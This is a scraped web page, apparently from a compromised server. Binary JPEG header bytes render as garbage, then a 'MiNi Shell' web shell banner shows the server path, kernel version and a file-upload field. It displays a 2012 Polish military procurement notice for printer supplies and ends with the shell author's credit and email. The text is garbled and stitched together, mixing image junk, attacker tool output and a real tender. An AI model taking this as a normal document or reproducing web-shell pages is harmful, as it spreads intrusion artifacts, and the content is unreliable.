JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/472506-N-2012.html

<p class="kh_header"><b>Zamość: Dostawa fabrycznie nowych materiałów eksploatacyjnych do sprzętu informatycznego oraz akcesoriów do czyszczenia komputerów</b><br>
<b>Numer ogłoszenia: 472506 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 32 Wojskowy Oddział Gospodarczy w Zamościu , Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, woj. lubelskie, tel. 84 618 15 36, faks 84 618 16 07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Infrastruktura.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowych materiałów eksploatacyjnych do sprzętu informatycznego oraz akcesoriów do czyszczenia komputerów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
1.	Przedmiotem zamówienia jest jednorazowa dostawa do 32 Wojskowego Oddziału Gospodarczego, ul. Piłsudskiego 36, 22-400 Zamość, budynek 
nr 38 fabrycznie nowych materiałów eksploatacyjnych do sprzętu informatycznego oraz akcesoriów do czyszczenia komputerów (zwanych dalej Materiałami) wraz z transportem i rozładunkiem do magazynu Zamawiającego.
2.	Wykaz Materiałów stanowiących przedmiot zamówienia:

L.p.	Nazwa asortymentu	Jm.	Ilość
1.		Bęben do telefaksu PANASONIC KX FL 613 KX FA84E	szt.	3
2.		Bęben do drukarki KONICA MINOLTA PAGE PRO 1300 W 	szt.	2
3.		Bęben do drukarki LEXMARK E260X22G	szt.	2
4.		Bęben do drukarki LEXMARK E 342N 12A8302	szt.	2
5.		Bęben do drukarki LEXMARK W 840 DN W 84030H	szt.	2
6.		Papier ksero A4 80g-m2 , min  CIE 161 (ryza = 500szt.)	ryza	3000
7.		Papier ksero A-3 80g-m2, min CIE 161 (ryza = 500szt.)	ryza	8
8.		Sprężone powietrze 400ML	op.	25
9.		Pianka do czyszczenia powierzchni plastikowych 400ML	op.	25
10.		Pianka do czyszczenia filtrów i szkła 400ML	op.	25
11.		Ściereczki nasączane 100 szt.	op.	60
12.		Toner do telefaksu PANASONIC KX-FP 218PD-S KX52-A	szt.	20
13.		Toner do telefaksu CANON L-140 FX-10	szt.	20
14.		Toner do telefaksu PANASONIC KX FL 613 KX FA83	szt.	20
15.		Toner do drukarki HP Laser Jet 1312  CB540A	szt.	15
16.		Toner do drukarki HP Laser Jet 1312  CB541C	szt.	8
17.		Toner do drukarki HP Laser Jet 1312 CB 542Y	op.	12
18.		Toner do drukarki HP Laser Jet 1312 CB543M	szt.	10
19.		Toner do drukarki HP1010 Q2612A	szt.	20
20.		Taśma czarna do drukarki OKI-321	szt.	14
21.		Toner do drukarki KONICA 1350W 1710566002	szt.	14
22.		Toner do drukarki Laser Jet CM 1015 MFP Q6002A	szt.	14
23.		Toner do drukarki Laser Jet CM 1015 MFP Q6003A	szt.	12
24.		Toner do drukarki Laser Jet CM 1015 MFP Q6000A	szt.	20
25.		Toner do drukarki Laser Jet CM 1015 MFP Q6001A	szt.	6
26.		Toner do drukarki DELL M5200 N 0888	szt.	6
27.		Toner do drukarki KOYCERA FS-1030DN TK 120	szt.	6
28.		Toner do drukarki PAGEPRO/1300 JW.-M 1300R	szt.	12
29.		Toner do drukarki BROTHER HL-5250DN TN3110	szt.	6
30.		Toner do drukarki HP LJ 1100A C4092A	szt.	3
31.		Toner do drukarki HP LJ 1160 Q5949A	szt.	12
32.		Toner do drukarki KOYCERA FS-4020DN TK 360	szt.	8
33.		Toner do drukarki KOYCERA FS-1370DN TK 170	szt.	8
34.		Toner do drukarki LEXMARK E342 E 330	szt.	10
35.		Toner do drukarki KOYCERA FS-1120D - TK160	szt.	8
36.		Toner do drukarki LEXMARK E460DN E460X31E	szt.	10
37.		Toner do drukarki LEXMARK W850DN W850H21G	szt.	5
38.		Toner do urządzenia wielofunkcyjnego KOYCERA FS-1028MFP TK130	szt.	5
39.		Tusz do drukarki HP OJ/6000 CD975AE	szt.	10
40.		Tusz do drukarki HP OJ/6000 CD974AE	szt.	3
41.		Tusz do drukarki HP OJ/6000 CD973AE	szt.	2
42.		Tusz do drukarki HP OJ/6000 CD972AE	szt.	2
43.		Toner do urządzenia wielofunkcyjnego KOYCERA 3050CI TK-8305M	szt.	2
44.		Toner do urządzenia wielofunkcyjnego KOYCERA 3050CI TK-8505K	szt.	2
45.		Toner do drukarki HP LJ 1200 C7115A	szt.	3000
46.		Toner do drukarki LEXMARK T 640 	szt.	8
47.		Toner do urządzenia wielofunkcyjnego KOYCERA 3050CI TK-8305Y	szt.	20
48.		Toner do urządzenia wielofunkcyjnego KOYCERA 3050CI TK-8305C	szt.	30
49.		Toner do drukarki HP 3800 Q6470A	szt.	30
50.		Toner do drukarki HP 3800 Q7581A	szt.	30
51.		Toner do drukarki HP 3800 Q7582A	szt.	8
52.		Toner do drukarki HP 3800 Q7583A	szt.	15
53.		Toner do drukarki OKI 14 EX	szt.	15
54.		Toner do drukarki KONICA MINOLTA BIZHUB C 220 TN 216K	szt.	25
55.		Toner do drukarki KONICA MINOLTA BIZHUB C 220 TN 216M	szt.	14
56.		Toner do drukarki  KONICA MINOLTA BIZHUB C 220 TN 216Y       	szt.	14
57.		Toner do drukarki KONICA MINOLTA BIZHUB C 220 TN216 C	szt.	14
58.		Toner do drukarki LEXMARK W 840 DN W 84020H	szt.	12
59.		Tusz do drukarki CANON IP 1800 PG-37	szt.	20
60.		Tusz do drukarki CANON IP 1800 CL-38	szt.	6
61.		Tusz do drukarki HP 845C CZARNY C6615DE	szt.	6
62.		Tusz do drukarki HP 845C KOLOR C6625AE	szt.	6
63.		Tusz do plotera EPSON STYLUS PRO 9700 14904516	szt.	12
64.		Tusz do plotera EPSON STYLUS PRO 9700 14904486	szt.	6
65.		Tusz do plotera EPSON STYLUS PRO 9700 14904547	szt.	3
66.		Tusz do plotera EPSON STYLUS PRO 9700 14904448	szt.	15
67.		Tusz do plotera EPSON STYLUS PRO 9700 14904548	szt.	8
68.		Tusz do drukarki HP 1315 6656	szt.	10
69.		Tusz do drukarki HP 1315 6657	szt.	10
70.		Tusz do drukarki HP 5150 NR 57	szt.	10
71.		Tusz do drukarki  HP DJ 500 MAGENTA NR 82 C4912A	szt.	10
72.		Tusz do drukarki  HP DJ 500 CYJAN  NR 82  C4911A	szt.	10
73.		Tusz do drukarki  HP DJ 500 ŻÓŁTY  NR 82 C4913A	szt.	8
74.		Tusz do drukarki  HP DJ 500 CZARNY NR 82 C4844AE	szt.	10
75.		Tusz do drukarki CANON MP 250 CZARNY 510	szt.	3
76.		Tusz do drukarki CANON MP 250 KOLOR 511	szt.	3
77.		Tusz do drukarki HP 5150 HP 56	szt.	20
78.		Tusz do drukarki HP 1280 CZARNY 51645AE	szt.	4
79.		Tusz do drukarki HP 1280 KOLOR C6578DE	szt.	4
80.		Tusz do drukarki HP CZARNY NR 10 C4844A	szt.	4
81.		Tusz do drukarki HP 7000 CD971AE	szt.	4
82.		Toner do drukarki HP 1215 (CB540A) CP CLJ BLACK	szt.	3
83.		Toner do drukarki HP 1215 (CB541A) CP CLJ CYAN	szt.	3
84.		Toner do drukarki HP 1215 (CB543A) CP CLJ MAGENTA	szt.	15
85.		Toner do drukarki HP 1215 (CB542A) CP CLJ YELLOW	szt.	4
86.		Toner do drukarki HP LJ 3050 12A (1010/1015)	szt.	4

3.	Dostawa wraz z transportem i rozładunkiem oraz odbiór zużytych opakowań i pojemników odbywać się będzie na koszt i ryzyko Wykonawcy, bezpośrednio do/z siedziby Zamawiającego.
4.	Odbiór dostawy Materiałów odbywać się będzie w miejscach wskazanych przez Zamawiającego wyłącznie w obecności przedstawiciela Wykonawcy lub jego pełnomocnika. 

5.	Wymaga się, aby materiały:
a)	były opakowane w oryginalne opakowania producentów, posiadały na opakowaniu zewnętrznym informacje pozwalające na identyfikację produktu producenta;
b)	były opakowane w wewnętrzne szczelne i hermetyczne opakowanie zabezpieczające przed kontaktem z otoczeniem;
c)	posiadały termin przydatności do użycia nie krótszy niż 12 miesięcy liczony od daty dostarczenia Materiałów do Zamawiającego (dotyczy materiałów mających określony termin przydatności do użycia);
d)	posiadały znak firmowy producenta, etykiety zawierające numer katalogowy, cechę Wykonawcy (np. pieczątka, naklejka) i termin przydatności do użycia;
e)	posiadały co najmniej 12 miesięczny okres gwarancji od dnia dostawy;
f)	były wyprodukowane w 2012 roku.
6.	Oferowane Materiały eksploatacyjne muszą spełniać wymagania producenta drukarek w zakresie jakości, muszą być fabrycznie nowe, nieregenerowane, niefabrykowane, niewchodzące wcześniej, pierwotnie w całości ani 
w części w skład innych materiałów w nienaruszonych opakowaniach producenta.
7.	Papier ksero do drukarek formatu A4 i A3 o gramaturze 80g/m2 i białości min. CIE161, ryza=500 ark.;
8.	Równoważne Materiały eksploatacyjne  muszą być fabrycznie nowe, bez śladów używania i uszkodzenia, w oryginalnych opakowaniach producenta, pełnowartościowe, nieregenerowane, nieprefabrykowane oraz kompatybilne ze sprzętem, do którego są przeznaczone.
9.	Wykonawca gwarantuje, że zamontowanie i użytkowanie dostarczonych przez niego równoważnych Materiałów eksploatacyjnych nie spowoduje uszkodzenia urządzenia, do którego są przeznaczone.
10.	Jeżeli w trakcie realizacji umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych Materiałów niekorzystnie odbiega od wymagań producenta drukarek, kopiarek, faksów, Wykonawca zobowiązuje się do gwarancyjnej wymiany produktu na nowy, wolny od wad w terminie 48 godz. (w dni robocze) od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie (e-mailem lub faksem). 
11.	W razie stwierdzenia wad produktu, wymiana nastąpi w siedzibie Zamawiającego na koszt i ryzyko Wykonawcy 
12.	W przypadku stwierdzenia uszkodzenia urządzenia na skutek używania wadliwych Materiałów eksploatacyjnych, Wykonawca pokrywa wszelkie koszty naprawy urządzenia, a w przypadku, gdy naprawa będzie niemożliwa, Wykonawca zobowiązuje się do wymiany sprzętu (urządzenia) na nowy, tej samej klasy lub wyżej. 
13.	Dostawca zobowiązuje się do odbioru zużytych opakowań i pojemników w zależności od potrzeb (po telefonicznym powiadomieniu), lecz nie rzadziej niż raz na pół  roku, przewidywane terminy odbioru zużytych opakowań i pojemników czerwiec 2013, listopad 2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.40.00-4, 30.19.77.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości 900zł. (słownie: dziewięćset złotych). 

2.	Wadium może być wniesione w jednej lub w kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3.	Wadium w formie pieniężnej należy wpłacić  przelewem na rachunek bankowy     32 Wojskowego Oddziału Gospodarczego w Zamościu, ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, konto nr: 30 1010 1339 0057 5713 9120 0000
Wadium musi być wniesione najpóźniej do godz. 13.00 dnia 04.12.2012 r.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym terminie znajdzie się na rachunku bankowym 32 Wojskowego Oddziału Gospodarczego w Zamościu. 

4.	Wadium w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty o których mowa w ustawie o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, należy złożyć w formie oryginału w budynku nr 29 pok. nr 15 (Sekcja Zamówień Publicznych), 32 Wojskowego Oddziału Gospodarczego w Zamościu, 
ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, najpóźniej do godz. 13.00  dnia 04.12.2012 r. 
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną  pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe - na każde pisemne żądanie zgłoszone przez 32 Wojskowy Oddział Gospodarczy w Zamościu, ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamość, w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty 32 Wojskowemu Oddziałowi Gospodarczemu w Zamościu,     ul. Marszałka Józefa Piłsudskiego 36, 22-400 Zamościu, pełnej kwoty wadium w okolicznościach określonych w art. 46 ustawy Prawo zamówień publicznych.
5.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
6.	Zamawiający zwraca wadium wszystkim Wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy prawo zamówień publicznych.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ustawy prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
10.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nielezących po jego stronie.
11.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentacji i zawarcia umowy wystawione przez wszystkich Wykonawców w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetarg.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 32 Wojskowy Oddział Gospodarczy w Zamościu 
ul. Marszałka Józefa Piłsudskiego 36, budynek nr 29, pokój nr 15.
Opłata za SIWZ- w formie przesyłki.
Bez opłat ze strony internetowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2012 godzina 13:00, miejsce: 32 Wojskowy Oddział Gospodarczy w Zamościu
ul. Marszałka Józefa Piłsudskiego 36
22-400 Zamość
Budynek nr 33, pokój nr 8 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com